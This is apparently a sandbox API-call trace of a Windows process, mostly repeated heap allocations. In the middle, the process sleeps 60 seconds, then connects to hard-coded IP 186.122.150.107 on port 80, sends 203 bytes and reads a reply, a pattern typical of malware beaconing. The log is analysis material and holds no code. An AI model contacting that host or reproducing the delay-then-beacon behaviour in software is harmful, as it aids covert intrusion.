[0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcf748 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcf8a0 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcf9f8 [0123.167] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x1fcfb50 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fcfca8 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fcfdf0 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fcff38 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd0080 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd01c8 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd0310 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd0458 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd05a0 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd06e8 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd0830 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd0978 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd0ac0 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd0c08 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd0d50 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd0e98 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x1fd0fe8 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x1fd1130 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x1fd1268 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x1fd13a0 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x1fd14d8 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x1fd1610 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x1fd1748 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x1fd1880 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x1fd19b8 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x1fd1af0 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x1fd1c28 [0123.168] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x1fd1d60 [0123.177] Sleep (dwMilliseconds=0xea60) [0133.184] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0133.184] socket (af=2, type=1, protocol=6) returned 0x200 [0133.185] htons (hostshort=0x50) returned 0x5000 [0133.185] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0133.185] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0133.186] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0133.186] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0133.186] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0133.186] connect (s=0x200, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0133.464] send (s=0x200, buf=0x19d8f8*, len=203, flags=0) returned 203 [0133.465] recv (in: s=0x200, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0133.942] closesocket (s=0x200) returned 0 [0133.943] WSACleanup () returned 0 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2021a18 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2024dd8 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2021e68 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2022d80 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2025000 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2022b58 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2025228 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2022090 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2022fa8 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x20224e0 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2022708 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x20233f8 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2051840 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2051a68 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2051eb8 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x204f7e8 [0133.943] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x20513f0 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x20511c8 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x20502b0 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x204fa10 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x204ed20 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2051618 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2052308 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2050fa0 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2051c90 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x20520e0 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x204fe60 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2050b50 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x20504d8 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2050088 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2026a60 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x20290f8 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2027488 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2026c68 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x20284c8 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x20288d8 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2027690 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2028ce8 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2027898 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2027aa0 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2027ca8 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2028ef0 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2026e70 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2029300 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2029508 [0133.944] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2053f50 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x202a010 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x202a7f0 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x202a208 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x202b1c8 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x202b3c0 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x202a400 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x202a9e8 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x202abe0 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x202add8 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x20570f0 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2058698 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2058890 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x20584a0 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2057ac8 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2056b08 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x20574e0 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x202be00 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x202c788 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x202c3b8 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x202cf28 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x202d6c8 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x202d110 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x202d2f8 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x202ba30 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x202bc18 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x20594c8 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2058f10 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x205a038 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2059a80 [0133.945] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x205a9c0 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x20590f8 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2059898 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x202dde8 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x202dfc0 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x202f408 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x202f7b8 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x202da38 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x202e548 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x202eca8 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x202ee80 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x202e720 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x202e8f8 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x202f058 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x205cac0 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x205b4a0 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x205b0f0 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x205b678 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x205af18 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2030dd8 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2030328 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2030fa0 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2031330 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20316c0 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x202fa40 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x202fc08 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x202fdd0 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20304f0 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x20306b8 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2030880 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x205dd60 [0133.946] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x205eba0 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x205df28 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x205e2b8 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x205d640 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2033258 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2032808 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2032128 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2032ee8 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2032498 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2032650 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2031c00 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x20335c8 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2033780 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2032b78 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x20330a0 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2031a48 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2031db8 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2031f70 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2060738 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x20603c8 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x20345e8 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2034c88 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2034298 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2034440 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2034790 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2034938 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2035328 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2034fd8 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x20354d0 [0133.947] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2035180 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2035678 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2035820 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2033a50 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2033bf8 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2033da0 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2033f48 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2035d88 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2037240 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20360b8 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2036be0 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2036718 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2035f20 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2036d78 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2036f10 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20370a8 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2036250 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2035a58 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20363e8 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2037570 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2037708 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x20378a0 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2035bf0 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2038cc0 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2038208 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2037ef8 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2038e48 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2038390 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20389b0 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2038518 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20392e0 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x20386a0 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2038fd0 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2037a60 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2039468 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2038828 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2037d70 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2038080 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2038b38 [0133.948] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2061af0 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20626b0 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2061c68 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20610a8 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20623c0 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2062c90 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2062828 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2061de0 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2061978 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2062538 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20620d0 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2061f58 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x20629a0 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2062248 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2062b18 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2060f30 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2003a78 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2003d48 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2063be0 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20630a0 [0133.949] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20642e8 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2063370 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2064180 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20634d8 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20645b8 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2064450 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2063d48 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2064720 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2064888 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2064cc0 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x20649f0 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2063208 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2007358 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2006898 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x20074b0 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2065a00 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x20658a8 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2065b58 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x20664c0 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2064f40 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2065750 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2065348 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x20654a0 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2066a20 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2065cb0 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2065098 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x20651f0 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2066770 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x200aba0 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x200af78 [0133.950] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x200b0c0 [0133.951] RtlAllocateHeap 